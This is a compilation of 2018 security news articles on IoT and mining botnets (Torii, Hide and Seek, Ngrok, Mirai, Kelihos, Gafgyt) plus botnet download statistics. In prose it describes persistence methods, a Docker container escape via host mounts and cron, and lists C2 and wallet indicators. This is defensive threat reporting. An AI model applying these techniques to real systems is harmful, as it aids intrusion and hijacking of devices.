- BotNet -

Last update 23.09.2017 19:27:30

Introduction  List  Kategorie  Subcategory 0  1  2  3  4  5  6  7  8 



Torii botnet, probably the most sophisticated IoT botnet of ever
30.9.2018 securityaffairs
BotNet

Avast spotted a new IoT botnet, tracked as Torii, that appears much more sophisticated and stealth of the numerous Mirai variants previously analyzed.
Security researchers spotted a new IoT botnet, tracked as Torii, that appears much more sophisticated and stealth of the numerous Mirai variants previously analyzed.

According to experts from Avast, the Torii bot has been active since at least December 2017, it could targets a broad range of architectures, including ARM, MIPS, x86, x64, PowerPC, and SuperH.

The Torii IoT botnet stands out for the largest sets of architectures it is able to target.

“Over the past week, we have been observing a new malware strain, which we call Torii, that differs from Mirai and other botnets we know of, particularly in the advanced techniques it uses.” reads the analysis published by Avast

“Unlike the aforementioned IoT botnets, this one tries to be more stealthy and persistent once the device is compromised, and it does not (yet) do the usual stuff a botnet does like DDOS, attacking all the devices connected to the internet, or, of course, mining cryptocurrencies.”

According to the experts, the Torii botnet is being used for stealing data from compromised IoT devices. The bot exfiltrates several data from compromised devices, including hostname and process ID.

The malicious code has a modular structure that is capable of fetching and executing other commands and executables, it leverages multiple layers of encrypted communication to avoid detection.

Another peculiarity of the Torii botnet it that it implements more than six ways to achieve persistence on the infected devices.

“Afterwards, the dropper makes sure that the second stage payload is executed and that it will remain persistent. It is unique in that it is remarkably thorough in how it achieves persistence.” continues the analysis.

“It uses at least six methods to make sure the file remains on the device and always runs. And, not just one method is executed – it runs all of them.

Automatic execution via injected code into ~\.bashrc
Automatic execution via “@reboot” clause in crontab
Automatic execution as a “System Daemon” service via systemd
Automatic execution via /etc/init and PATH. Once again, it calls itself “System Daemon”
Automatic execution via modification of the SELinux Policy Management
Automatic execution via /etc/inittab“
Torii infects devices with Telnet exposed and protected by weak credentials, it first executes a sophisticated script used to determines the architecture of the target.

The script then downloads the first-stage payload that acts as a dropper for the second-stage payload.

Experts said that the bot component communicates with the CnC with active polling in an endless loop, waiting for commands to execute. Once executed the command, the bot will reply with the results of its execution.

The samples analyzed by the expert were communicating with a command-and-control server that is located in Arizona.

At the time of the analysis, Telnet is the only vector used by the bot to compromise other devices.

According to BleepingComputer, the malicious code was also analyzed by the Italian cyber security expert Marco Ramilli who noticed similarities to the Persirai.

Vess
@VessOnSecurity
· Sep 20, 2018
My honeypot just caught something substantially new. Spreads via Telnet but not your run-of-the-mill Mirai variant or Monero miner...

First stage is just a few commands that download a rather sophisticated shell script, disguised as a CSS file. (URL is still live.) pic.twitter.com/r5L0I8PC0h

View image on Twitter

Marco Ramilli
@Marco_Ramilli
Just reversed, it looks like a known Persirai worm. Following the core: $x5 = “npxXoudifFeEgGaACScs”. Anyway thanks for sharing it @VessOnSecurity It has been fun ! pic.twitter.com/BrQzdfMFVB

10:44 AM - Sep 27, 2018
View image on Twitter
1
See Marco Ramilli's other Tweets
Twitter Ads info and privacy
“Even though our investigation is continuing, it is clear that Torii is an example of the evolution of IoT malware, and that its sophistication is a level above anything we have seen before.” concludes the analysis.

“Once it infects a device, not only does it send quite a lot of information about the machine it resides on to the CnC, but by communicating with the CnC, it allows Torii authors to execute any code or deliver any payload to the infected device. This suggests that Torii could become a modular platform for future use.”

Further details, including IoCs are reported in the analysis published by Avast.


Meet Torii, a Stealthy, Versatile and Highly Persistent IoT Botnet
28.9.2018 securityweek
BotNet  IoT

There’s a new Internet of Things (IoT) botnet lurking around, a stealthy one that attempts to achieve persistence by running six different routines at once, Avast has discovered.

Dubbed Torii, because some of the hits to a honeypot were observed coming from Tor exit nodes, the botnet targets multiple architectures, but doesn’t appear to include the usual set of malicious capabilities that IoT botnets are famous for, such as distributed denial of service (DDoS), spam, or crypto-mining.

It does, however, pack a rich set of information exfiltration features, as well as a modular architecture that allows it to fetch and execute commands and files, all via multiple layers of encrypted communication.

Active since at least December 2017, Torii can infect devices powered by MIPS, ARM, x86, x64, PowerPC, SuperH, Motorola 68k, and others, Avast has discovered. The malware targets weak credentials over the Telnet protocol and, after the initial compromise, it executes a shell script to determine the device’s architecture and download the appropriate payload, either over HTTP or FTP.

The script fetches a binary file that represents a dropper for the second-stage payload, and which attempts to make it persistent using multiple methods. The second-stage is contained within the first ELF file and is installed to a pseudo-random location.

After executing the payload, the dropper executes six different methods for persistence: via injected code into ~\.bashrc, via “@reboot” clause in crontab, as a “System Daemon” service via systemd, via /etc/init and PATH (it calls itself System Daemon), via modification of the SELinux Policy Management, and via /etc/inittab.

A full-fledged bot, the second-stage is capable of executing commands from the command and control (C&C) server. The malware also includes simple anti-debugging techniques, data exfiltration, multi-level encryption of communication, and other capabilities.

With many of the functions in the second stage also found in the dropper, Avast’s security researchers suggest that they were both built by the same developer. However, while the code in the dropper is almost identical for all architectures, the second stage binaries show differences based on the targeted hardware architectures.

The malware uses the simple anti-analysis method of a 60 second sleep after execution and attempts to randomize the process name to avoid detection of blacklisted process names. The author also stripped the symbols from executables to make analysis more difficult.

The C&C address is encrypted using a XOR-based cipher and each Torii variant contains 3 addresses, Avast discovered. Since September 15, the domain names have resolved to IP 66.85.157.90, which also hosts other suspicious domains, the security researchers say. Communication with the C&C server is done via TCP port 443.

When connecting to the server, Torii exfiltrates information such as hostname, process ID, path to second stage executable, all MAC addresses in /sys/class/net/%interface_name%/address and its MD5 hash, data found by uname() call (sysname, version, release, and machine), and the outputs of various commands that gather additional information from the compromised machines.

The malware continuously asks the server if there are any commands it should execute, the security researchers discovered. After receiving a command, the threat replies with the results of the execution.

Another binary found on the attackers’ FTP server, sm_packed_agent, contains functionality that could be used to send any remote command to the target device. Written in the Go language, it could be easily recompiled to run on virtually any architecture and could serve as backdoor or a service to orchestrate multiple machines, the researchers say.

“Even though our investigation is continuing, it is clear that Torii is an example of the evolution of IoT malware, and that its sophistication is a level above anything we have seen before. Once it infects a device, not only does it send quite a lot of information about the machine it resides on to the C&C, but by communicating with the C&C, it allows Torii authors to execute any code or deliver any payload to the infected device. This suggests that Torii could become a modular platform for future use,” Avast concludes.


Hide and Seek (HNS) IoT Botnet targets Android devices with ADB option enabled
27.9.2018 securityaffairs 
BotNet  IoT

The latest samples of the HNS bot were designed to target Android devices having the wireless debugging feature ADB enabled.
The Hide and Seek (HNS) IoT botnet was first spotted early this year, since its discovery the authors continuously evolved its code.

The IoT botnet appeared in the threat landscape in January, when it was first discovered on January 10th by malware researchers from Bitdefender, then it disappeared for a few days, and appeared again a few weeks later infecting in a few days more than 20,000 devices.

The botnet initially spread infecting unsecured IoT devices, mainly IP cameras, in July security experts from Fortinet discovered that the Hide ‘N Seek botnet was improved to target vulnerabilities in home automation systems.

In the same month, experts from Netlab observed the Hide ‘N Seek botnet targeting also cross-platform database solutions. It is currently the first IoT malware that implements a persistence mechanism to keep devices infected after reboots.

The latest samples of the HNS bot were designed to target Android devices having the wireless debugging feature enabled instead of exploiting known vulnerabilities.

By default, Android has Android Debug Bridge (ADB) option disabled, but often vendors enable it to customize the operating system, then ship the devices with the feature turned on.

The authors of the HNS botnet are attempting to compromise new devices by exploiting the features.

“The newly identified samples add functionality by exploiting the Android Debug Bridge (ADB) over Wi-Fi feature in Android devices, which developers normally use for troubleshooting.” reads the analysis published by BitDefender.

“While it’s traditionally disabled by default, some Android devices are shipped with it enabled, practically exposing users to remote connections via the ADB interface that’s accessible using the TCP port 5555. Any remote connection to the device is performed unauthenticated and allows for shell access, practically enabling attackers to perform any task in administrator mode.”

In February 2018, security researchers at Qihoo 360’s Netlab have spotted an Android mining botnet that was targeting devices with ADB interface open.

The recent improvement of the Hide and Seek botnet, allowed its operators to add 40,000 new devices, most of them in Taiwan, Korea, and China.

HnS ADB_exposed_Shodan

Expert pointed out that the HNS bot could infect any device, including smart TVs and DVRs, that has ADB over Wi-Fi enabled could be affected too.

“It’s safe to say that not just Android-running smartphones are affected — smart TVs, DVRs and practically any other device that has ADB over Wi-Fi enabled could be affected too.” concludes Bitdefender.

“Considering the evidence at hand, we speculate the botnet operators are constantly adding new features to “enslave” as many devices as possible, although the true purpose of the botnet remains unknown.”


Ngrok Mining Botnet
23.9.2018 securityaffairs
BotNet

The Ngrok campaign is unique in terms of its overall sophistication for a Docker-based attack vector.
Specifically, it demonstrates a novel, dynamic and robust operational security model and the ability to detect and attack newly deployed and misconfigured infrastructure.

Additionally, the campaign is sophisticated in seeking to detect, analyse and neutralise other competing crypto-mining malware. Its agile process can be flexed to quickly deal with new entrant-attacks and ensure a full share of the victim’s CPU resources for its activities.

Introduction
In my previous post I discussed the initial prototyping of a Docker Honeypot / Sandbox called Whaler. I’ve now been running this for a few months and tracking the number of campaigns with a range of sophistication. The most sophisticated of these was the first attack observed within hours of the initial deployment. I named the campaign Ngrok after the inventive reverse proxy used to hide the C2 infrastructure.

I’ve been following the Monero mining pool address used in the Ngrok campaign and regularly checking for other research references on the internet. The campaign has gone largely unnoticed until a recent blog published by 360totalsecurity which prompted me to finally write-up the analysis. As of today (20 Sept) the campaign is still active.

Note: I’d previously documented this as a presentation which I’ve been using in job interviews – key slides are extracted and covered below.

Whaler – attack types and analysis
Before getting into the details of the Ngrok campaign, it’s worth summarising the key findings from the first few months of operations and development. Firstly nearly all attacks observed were Crypto-mining attackers. One exception appeared to attempt to stage a meterpreter payload to the server, but I was unable to follow-up in time on this and the attacker did not repeat the attack.

Most attackers seem to rely on discovery and indexing by Shodan as a source for their target list. There’s a clear correlation between the honeypot first appearing on Shodan and an immediate wave of attacks.

The attacks broadly fall into three levels of sophistication:

Low Complexity – Simply pulling a pre-baked mining image from Docker Hub and running it with parameterisation for the attackers mining pool / account
Medium Complexity – Again using Docker Hub, but creating their own container images, often with misleading names (eg mysql) but essentially containing a fully configured crypto-miner. Several of these were reported and shut down quickly working with the Docker security team. Other malware, such as an IRC botnet, was also observed bundled with the miner software.
High Complexity – These attackers either ran their own target scanning operations, or leveraged their botnets to do this work for them. They were therefore able to detect and attack victims much quicker. Some of these attacks used the volume mounting feature of the Docker Daemon to execute a container escape – and therefore could install their payloads on the “host” system – invisible to Docker and any monitoring of running containers.
First Attack

Attack timing for Ngrok campaign

The first attack was observed within a few hours of deploying the initial Whaler prototype. The attack was occurring approximately every 2 hours in a continuous cycle – which indicates the attack is automated.

Ngrok
Pcap analysis of Ngrok attack
The user agent string confirms this is likely automated, and the attacker is using an open source lightweight Ruby based docker API client framework from Swipely.

The attacking IP address is consistently hidden behind a VPN service.

Exploit

Whaler “Fingerprint” for Ngrok attack
Whaler was enhanced to provide a “fingerprint” of each attack. This is used to determine how much of the attack data (Docker images, containers, pcap files etc) to retain, based on the probability this attack has already been seen. Automated attacks can drive a large amount of data storage requirements if this isn’t managed carefully!

The attack fingerprint for Ngrok is shown above. Key features are:

The attacker uses a public alpine docker image, pre-installed with curl. There is nothing malicious about this publicly available container
The container is parameterised to use curl to download and run a staging script from a ngrok reverse proxy address – eg hiding the backend C2 infrastructure
Note: The ngrok.io subdomains are rotated through a set of 52 which are replaced every 8 hours
Each victim has a unique hash identifier to identify their IP – this is used for reporting back to the C2 on details of the host and infection status
The container mounts the root file system of the host and creates a crontab entry to execute the stager script outside of docker – this is a classic docker container escape
There is a parameter to identify that the stager for Docker (d) should be downloaded – the attacker has a broader target scope including other misconfigured products as discussed later
Stage1 – Loader
The loader script, once running on the host system (outside of Docker) performs the following actions.

Enumerate all processes and immediately kill any that meet a pre-defined kill list (other mining processes)
Install the miner for the attacker by downloading two further binaries
Report back to the C2 server (via ngrok) on the following:
Process ID of the infection by this attack
Number of CPUs
Current Username
Process name, binary location and MD5 sum of binary of anything currently running above 20% CPU
The last data point reported here enables the attacker to identify new mining campaigns and adjust their script to also target termination of those processes where found.

During the course of the analysis it was also noted that additional code was added to search for and inject Coinhive mining code into any javascript files found on the server. If these are then served via a web server it would result in further browser-based mining on behalf of the attacker.

Stage 2 – Scanner
Once the installation has been successfully completed and the infection has been reported back to the C2 infrastructure, a second script is delivered using the same mechanism as before (container escape -> cron job).

This second stage is used to enlist the victim to mas-scan a large section of IPv4 space looking for further victims. The script downloads Zmap, Zgrab and JQ and performs a scan of a pre-defined series of 8K blocks of the internet looking for:

Redis on port 6379
Docker on port 2375
Jenkins, Drupal and Modx on ports 80 and 8080
CouchDB on 5984
Ethereum on 8545
Results are reported back to the C2, and hence the cycle repeats.

Overview of Attacker Infrastructure
Ngrok

An overview of the Ngrok infrastructure is shown above.

Hash Rate & Payment History
Ngrok
Ngrok account hash rate over time
The deployed miner was configured to use the minexmr pool, and the wallet id used is:

4AuKPF4vUMcZZywWdrixuAZxaRFt9FPNgcv9v8vBnCtcPkHPxuGqacfPrLeAQWKZpNGTJzxKuKgTCa6LghSCDrEyJ5s7dnW

Using this we can see that this account was first used in early April, with approximate hashing capacity of 30-40k/s and there was a significant increase in capacity in early June, peaking at 90k/s. This uplift correlates with 360totalsecurity’s observation that the attacks “started in June” – perhaps indicating an additional target infrastructure that triggered their honeypots.

For reference, benchmarking the miner on a 1 CPU cloud server, the peak mining capacity here would be in the region of 2000 virtual CPUs.

Ngrok 9

Ngrok cumulative profit
The campaign has produced a steady, but relatively low, stream of income. It is possible that other accounts are used – in fact we also have the Coinhive account, which we are unable to determine the hashing rate or any payment details.

Between April and late August the attackers had made approx £5000 GBP.

Further details includig IoC are available at the following URL:

Ngrok Mining Botnet


Mirai Authors Avoid Prison After Working With FBI
20.9.2018 securityweek
BotNet

Three individuals who last year admitted creating and using the notorious Mirai botnet have avoided prison after helping the FBI in other cybercrime investigations, the U.S. Department of Justice announced on Tuesday.

Josiah White, 21, of Washington, Pennsylvania; Paras Jha, 22, of Fanwood, New Jersey; and Dalton Norman, 22, of Metairie, Louisiana, pleaded guilty in December 2017 to criminal informations in relation to Mirai and what authorities call the “Clickfraud” botnet.

The Justice Department said on Tuesday that each of the men were sentenced to five years of probation and 2,500 hours of community service. They have also been ordered to pay $127,000 in restitution, and they have voluntarily handed over significant amounts of cryptocurrency seized during the investigation into their activities.

Jha, White, and Norman are said to have “cooperated extensively” with the FBI on complex cybercrime investigations before their sentencing and they will continue doing so. They must also cooperate with law enforcement and the broader research community.

The Mirai botnet ensnared hundreds of thousands of IoT devices, allowing cybercriminals to launch powerful distributed denial-of-service (DDoS) attacks and conduct click fraud. Authorities said the three earned roughly $180,000 through their click fraud scheme.

Jha, a former Rutgers University computer science student, admitted writing the Mirai code and setting up the command and control (C&C) infrastructure.

The Mirai botnet attacks were investigated by the FBI’s Field Office in Anchorage, Alaska, and the cybercriminals were sentenced by the Chief U.S. District Judge in Alaska.

“Cybercrime is a worldwide epidemic that reaches many Alaskans,” said Bryan Schroder, the U.S. Attorney for the District of Alaska. “The perpetrators count on being technologically one step ahead of law enforcement officials. The plea agreement with the young offenders in this case was a unique opportunity for law enforcement officers, and will give FBI investigators the knowledge and tools they need to stay ahead of cyber criminals around the world.”

The conviction of Jha, White, and Norman is the result of cooperation between government agencies in the US, UK, Northern Ireland, and France, and private-sector companies such as Palo Alto Networks, Google, Cloudflare, Coinbase, Flashpoint, Oath, Qihoo 360 and Akamai.

Security blogger Brian Krebs correctly identified Jha and White as authors of Mirai in January 2017.


Dissecting the first Gafgyt bot implementing the “Non Un-Packable” NUP technique
19.9.2018 securityaffairs
BotNet

Experts at the CSE Cybsec Z-Lab have found a Gafgyt variant implementing the “Non Un-Packable” technique recently presented in a cyber security conference
A new variant of the Gafgyt botnet is spreading in the last hours and experts of the CSE Cybsec Z-Lab have found it with the support of the Italian cyber security experts @Odisseus and GranetMan.

The new variant analyzed in the report published by the experts was found on a system resolving the IP address owned by the Italian ISP Aruba. This specific version implements some advanced packing techniques that make the static analysis much harder.

We downloaded the sample directly from the compromised server, we found four samples of the Gafgyt variant that were already compiled for the specific architecture, X86-64, X86-32, MIPS, ARM.

The sample shows the same behavior associated with the classic Gafgyt botnet but we immediately noticed a distinctive feature, the implementation of “Non Un-Packable” NUP technique.

Malware Must Die leader @unixfreaxjp presented the sophisticated technique at the recent Radare conference (r2con2018) in his talk about the “Non Un-Packable” packer.

According to the experts the “Non Un-Packable” ELF was around since a few months before the talk and our discovery confirms that malware developers started adopting it.

The report includes a detailed analysis of the malware.


Mirai authors avoid the jail by helping US authorities in other investigations
19.9.2018 securityaffairs
BotNet

Three men who admitted to being the authors of the Mirai botnet avoided the jail after helping the FBI in other cybercrime investigations.
I’m following the evolution of Mirai botnet since MalwareMustDie shared with me the findings of its investigation in August 2016.

Now three individuals who admitted to being the authors of the infamous botnet avoided the jail after helping feds in another cybercrime investigations.

The three men, Josiah White (21) of Washington, Pennsylvania; Paras Jha (22), of Fanwood, New Jersey, and Dalton Norman (22), of Metairie, Louisiana, pleaded guilty in December 2017 to developing and running the dreaded Mirai botnet that was involved in several massive DDoS attacks.

The identification and conviction of the three men is the result of an international joint cooperation between government agencies in the US, UK, Northern Ireland, and France, and private firms, including Palo Alto Networks, Google, Cloudflare, Coinbase, Flashpoint, Oath, Qihoo 360 and Akamai.

According to the plea agreements, White developed the Telnet scanner component used by Mirai, Jha created the botnet’s core infrastructure and the malware’s remote control features, while Norman developed new exploits.

Jha, who goes online with the moniker “Anna-senpai” leaked the source code for the Mirai malware on a criminal forum, allowing other threat actors to use it and making hard the attribution of the attacks.

Jha also pleaded guilty to carrying out multiple DDoS attacks against his alma mater Rutgers University between November 2014 and September 2016, before creating the Mirai botnet. According to the authorities, the three earned roughly $180,000 through their click fraud scheme.

The Mirai case was investigated by the FBI Field Office in Anchorage, and the Chief U.S. District Judge in Alaska sentenced the men.

“U.S. Attorney Bryan Schroder announced today that three defendants have been sentenced for their roles in creating and operating two botnets, which targeted “Internet of Things” (IoT) devices. Paras Jha, 22, of Fanwood, New Jersey; Josiah White, 21, of Washington, Pennsylvania; and Dalton Norman, 22, of Metairie, Louisiana, were sentenced today by Chief U.S. District Judge Timothy M. Burgess.” states the press release published by the DoJ.

“On Dec. 8, 2017, Jha, White, and Norman pleaded guilty to criminal Informations in the District of Alaska charging them each with conspiracy to violate the Computer Fraud & Abuse Act in operating the Mirai Botnet. Jha and Norman also pleaded guilty to two counts each of the same charge, one in relation to the Mirai botnet and the other in relation to the Clickfraud botnet.”

On Tuesday, the DoJ revealed on Tuesday that each of the men was sentenced to five years of probation and 2,500 hours of community service.

The judges required them to repay $127,000, and they have voluntarily handed over huge amounts of cryptocurrency that the authorities seized as part of the investigation on the botnet.

mirai

The three men have “cooperated extensively” with the authorities helping the FBI on complex cybercrime investigations before the sentence. The trio will continue to offer their support to the feds.

“After cooperating extensively with the FBI, Jha, White, and Norman were each sentenced to serve a five-year period of probation, 2,500 hours of community service, ordered to pay restitution in the amount of $127,000, and have voluntarily abandoned significant amounts of cryptocurrency seized during the course of the investigation.” continues the press release.

” As part of their sentences, Jha, White, and Norman must continue to cooperate with the FBI on cybercrime and cybersecurity matters, as well as continued cooperation with and assistance to law enforcement and the broader research community.”


Kelihos botmaster pleads guilty in U.S. District Court in Connecticut
14.9.2018 securityaffairs BotNet  Crime

The creator of the infamous Kelihos Botnet, Peter Yuryevich Levashov (38) pleaded guilty this week to computer crime, fraud, conspiracy and identity theft charges.
Yuryevich Levashov (38), the botmaster of the dreaded Kelihos Botnet pleaded guilty this week to computer crime, fraud, conspiracy and identity theft charges.

In April 2017, the United States Department of Justice announced that Peter Yuryevich Levashov (36) (also known as Petr Levashov, Peter Severa, Petr Severa and Sergey Astakhov) was arrested in Barcelona for his involvement with the infamous Kelihos botnet. Levashov was extradited to the United States in February.

“Peter Yuryevich Levashov, aka “Petr Levashov,” “Peter Severa,” “Petr Severa” and “Sergey Astakhov,” 38, of St. Petersburg, Russia, pleaded guilty today in U.S. District Court in Hartford, Connecticut, to offenses stemming from his operation of the Kelihos botnet, which he used to facilitate malicious activities including harvesting login credentials, distributing bulk spam e-mails, and installing ransomware and other malicious software.” states the press release published by the DoJ.

Levashov on Wednesday pleaded guilty in U.S. District Court in Hartford, Connecticut, to one count of causing intentional damage to a protected computer, one count of conspiracy, one count of aggravated identity theft, and one count of wire fraud.

kelihos botnet

According to a study conducted by CheckPoint Security, a malware landscape was characterized by some interesting changed in this first part of 2017.

The Kelihos botnet climbed to the top position, while the Conficker worm dropped to fourth on the chart of malware.

Levashov has operated several botnets between since the late 1990s, for example, two other botnets tracked as Storm and Waledac borrow the code with Kelihos, both have been attributed to Levashov.

“For over two decades, Peter Levashov operated botnets which enabled him to harvest personal information from infected computers, disseminate spam, and distribute malware used to facilitate multiple scams,” said Assistant Attorney General Benczkowski.

“Mr. Levashov used the Kelihos botnet to distribute thousands of spam e-mails, harvest login credentials, and install malicious software on computers around the world,” said U.S. Attorney Durham. “He also participated in online forums on which stolen identities, credit card information and cybercrime tools were traded and sold. For years, Mr. Levashov lived quite comfortably while his criminal behavior disrupted the lives of thousands of computer users. “

The DoJ speculated Levashov sent spam urging recipients to buy shares as part of a “pump and dump” scam, among other naughtiness.

The Russian hacker was accused to have used the Kelihos botnet for spam campaign that advertised various criminal schemes, including pump-and-dump stock fraud.

The activity conducted by the Kelihos, Storm and Waledac botnets was very profitable, prosecutors believe they allowed crooks to earn hundreds of millions of dollars

“For years, Mr. Levashov lived quite comfortably while his criminal behavior disrupted the lives of thousands of computer users,” said U.S. Attorney John H. Durham of the District of Connecticut. “Thanks to the collaborative work of the FBI and our partners in law enforcement, private industry and academia, a prolific cybercriminal has been neutralized, and has now admitted his guilt in a U.S. courtroom.”

The sentence has been scheduled for September 6, 2019, likely because the man is now helping law enforcement agencies on investigations on other cybercrime operations.


Kelihos Botnet Author Pleads Guilty in U.S. Court
14.9.2018 securityweek BotNet

Peter Yuryevich Levashov, a 38-year-old Russian national accused of operating the notorious Kelihos botnet, pleaded guilty on Wednesday to computer crime, fraud, conspiracy and identity theft charges.

Levashov, aka “Petr Levashov,” “Peter Severa,” “Petr Severa” and “Sergey Astakhov,” is said to have operated several botnets between the late 1990s and April 2017, when he was arrested.

The Storm and Waledac botnets, which share source code with Kelihos, have also been attributed to Levashov. Levashov’s malware had infected hundreds of thousands of computers, allowing him and other cybercriminals who rented the botnets to send spam and steal valuable information from compromised devices. Authorities said the man also took part in operating various cybercrime forums.

The Kelihos, Storm and Waledac botnets reportedly generated hundreds of millions of dollars for cybercriminals. Data leaked in 2010 after hackers broke into the systems of a pharmacy spam program showed that Levashov had made nearly $600,000 from these types of activities over a 3-year period.

Spamhaus’ entry on Levashov in its Register of Known Spam Operations (ROKSO) describes the Russian as “one of the longest operating criminal spam-lords on the internet.”

Levashov was indicted in the United States on April 20, just days after his arrest in Spain and action taken by authorities to dismantle the Kelihos botnet. He was extradited to the United States in February.

Levashov on Wednesday pleaded guilty in U.S. District Court in Hartford, Connecticut, to one count of causing intentional damage to a protected computer, one count of conspiracy, one count of aggravated identity theft, and one count of wire fraud.

His sentencing has been scheduled for September 6, 2019, and he will remain in custody until then. It’s unclear why the judge scheduled sentencing for one year from now, but it could indicate that Levashov is working with law enforcement agencies on dismantling other cybercrime operations.

“For years, Mr. Levashov lived quite comfortably while his criminal behavior disrupted the lives of thousands of computer users,” said U.S. Attorney John H. Durham of the District of Connecticut. “Thanks to the collaborative work of the FBI and our partners in law enforcement, private industry and academia, a prolific cybercriminal has been neutralized, and has now admitted his guilt in a U.S. courtroom.”


Mirai and Gafgyt target Apache Struts and SonicWall to hit enterprises
10.9.2018 securityaffairs BotNet

Security experts with Unit 42 at Palo Alto Networks have discovered new variants of the Mirai and Gafgyt IoT malware targeting enterprises.
Both botnets appear very interesting for two main reasons:

The new Mirai variant targets the same Apache Struts vulnerability exploited in the 2017 Equifax data breach. The vulnerability affects the Jakarta Multipart parser upload function in Apache and could be exploited by an attacker to make a maliciously crafted request to an Apache web server.
The new Gafgyt variant targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).
The fact that bot malicious codes are targeting Apache Struts and SonicWall could indicate a shift from consumer device targets to enterprise targets.

“These developments suggest these IOT botnets are increasingly targeting enterprise devices with outdated versions.” reads the analysis published by Palo Alto Networks.

“All organizations should ensure they keep not only their systems up-to-date and patched, but also their IoT devices.”

In September the experts detected Mirai samples that include the exploit code for 16 vulnerabilities, for the first time the malware target vulnerability in Apache Struts.

The samples are hosted on a domain that in August resolved to a different IP address August. In August, the same IP address was intermittently hosting samples of Gafgyt that were including the exploit code to trigger the CVE-2018-9866 flaw affecting older versions of SonicWall Global Management System (GMS).

The same domain has also been found associated with other Mirai activity in the past.

“For part of the month of August 2018, that same domain resolved to a different IP address 185[.]10[.]68[.]127.” continues the analysis. “At that time we found that IP hosting samples of Gafgyt containing an exploit for a recently disclosed SonicWall vulnerability (CVE-2018-9866) affecting older, unsupported versions of SonicWall Global Management System (GMS) (8.1 and older) that is not present in currently supported versions.”

Experts noticed that the new Mirai samples don’t include the bruteforce functionality differently from other variants, they use l[.]ocalhost[.]host:47883 as C2, and implement the same encryption scheme as Mirai with the key 0xdeadf00d.

The Gafgyt samples first appeared in the wild on August 5, a few days after the publication of a Metasploit module for the SonicWall issue. The samples borrow the code from Gafgyt rather than Mirai.

“The incorporation of exploits targeting Apache Struts and SonicWall by these IoT/Linux botnets could be an indication of a larger movement from consumer device targets to enterprise targets.” concludes Palo Alto Networks.

Further details, including IoCs, are reported in the analysis published by the experts.


What are botnets downloading?

5.9.2018 Kaspersky   BotNet
Statistics for the past year on files downloaded by botnets
CONTENTS
Spam mailshots with links to malware and bots downloading other malware are just a couple of botnet deployment scenarios. The choice of infectious payload is limited only by the imagination of the botnet operator or customer. It might be a ransomware, a banker, a miner, a backdoor, the list goes on, and you don’t need to go far for examples: take Gandcrab and Trik, or Locky and Necurs, for instance. Every day we intercept numerous file-download commands sent to bots of various types and families. Here we present the results of our botnet activity analysis for H2 2017 and H1 2018.

Methodology
Excluded from the statistics are update files downloaded by bots, since their number depends heavily on the algorithm of the particular malware in question and has an impact on the final distribution. The analysis also excludes configuration files whose download depends on the botnet algorithm and is not relevant to this article. What’s more, we only took account of unique (in terms of MD5 hash) files. The results are based on the analysis of commands from more than 60,000 different C&C associated with 150 bot families and their modifications.

Kaspersky Lab tracks the activity of botnets using Botnet Tracking, a technology that emulates infected computers (bots) to retrieve operational data about the actions of botnet operators.

The total number of unique malicious files downloaded by our bots in H1 2018 fell by 14.5% against H2 2017.

Number of unique malicious files, H2 2017 — H1 2018 (download)

Most popular
After analyzing the files downloaded by the bots, we identified the most widespread families. Note that the top of the list of most “popular” downloads changes little over time. In 2018, as last year, the backdoor njRAT accounted for many downloads. Its share among all files downloaded by bots increased from 3.7% to 5.2%, meaning that more than 1 in each 20 bot-downloaded files is njRAT. This widespread distribution is due to the variety of versions of the malware and the ease of setting up one’s own backdoor, creating a low entry threshold.

H2 2017 Share H1 2018 Share
1 Lethic 17.0% njRAT 5.2%
2 Neutrino.POS 4.6% Lethic 5.0%
3 njRAT 3.7% Khalesi 4.9%
4 Emotet 3.5% Miners 4.6%
5 Miners 2.9% Neutrino.POS 2.2%
6 Smoke 1.8% Edur 1.3%
7 Cutwail 0.7% PassView 1.3%
8 Ransomware 0.7% Jimmy 1.1%
9 SpyEye 0.5% Gandcrab 1.1%
10 Snojan 0.3% Cutwail 1.1%
Most downloaded threats, H2 2017 — H1 2018

Very often, botnets are used to distribute cryptocurrency mining tools. In H1 2018 miners accounted for 4.6% of all downloaded files, a far higher figure than in H2 2017 (2.9%).

Yet cybercriminal interest in ordinary currencies remains high, as evidenced by the presence of Neutrino.POS and Jimmy in the Top 10. In H2 2017, Neutrino.POS was downloaded in 4.6% of all cases. In 2018, its share in the overall stream of downloaded files declined, but its “cousin” Jimmy helped out by adding 1.1% to the share of banking Trojans.

Distribution map of the Top 10 downloaded threats, H2 2017 (download)

In H1 2018, the Trojan Khalesi was in third place in our ranking, accounting for 4.9% of downloaded files. But while in 2017 the Remcos, BetaBot, Smoke, and Panda bots were involved in downloading the Trojan, in 2018 Khalesi was downloaded only by the spam bot Lethic.

On a separate note, the H1 2018 Top 10 features Mail PassView, a legal password recovery tool for various email clients. Distributed via the Remcos backdoor, it is likely used to obtain passwords for victim mailboxes.

The Cutwail, Lethic, and newly rebranded Emotet bots are also firmly rooted in the Top 10.

Compared to H2 2017, the number of ransomware encryptors downloaded by bots has risen this year. Despite the overall decline in the distribution of ransomware programs, botnet operators continue to deliver them to victims. According to our data, most ransomware programs in 2017 were downloaded by the Smoke bot, but in 2018 top spot has been seized by Nitol. GandCrab ransomware is a newbie in the Top 10 most downloaded families of 2018. It appeared in 2018 and was immediately deployed and distributed by several botnet operators, most actively by Trik.

Distribution map of the Top 10 downloaded threats, H1 2018 (download)

In terms of behavior, the clear leaders in both halves are Trojans with such diverse capabilities that it’s difficult to pinpoint their “specialization.” A significant proportion is made up of bankers and backdoors ensuring maximum theft of important information. What’s more, last year’s most common malware included a large number of spam bots, largely due to the above-mentioned Lethic.

Distribution of downloaded files by behavior, H2 2017 — H1 2018 (download)

Most “versatile”
Among the families under observation, we identified the most “versatile” — that is, those downloading the largest number of different files. Such diversity can be the result of several factors:

Different botnets from the same family are managed by different operators with varying objectives.
Operators “lease” their botnets, allowing them to be used to distribute malware.
A botnet changes its “specialization” (for example, Emotet turned from a banking Trojan turned into a spam bot)
In 2018, as in 2017, the most “versatile” bots were Hworm, Smoke, and BetaBot (a.k.a. Neurevt).

Distribution of downloaded files by behavior for Hworm, H2 2017 — H1 2018 (download)

Distribution of downloaded files by behavior for Smoke, H2 2017 — H1 2018 (download)

Distribution of downloaded files by behavior for Betabot, H2 2017 — H1 2018 (download)

As we already mentioned, hidden mining software is very popular, as confirmed by the statistics. Despite the variety of downloaded malware, miners invariably end up in the Top 3.

Backdoors also feature heavily due to the wide-ranging options they provide for cybercriminals, from saving screenshots and keystrokes to direct control over the target device.

Most “international”
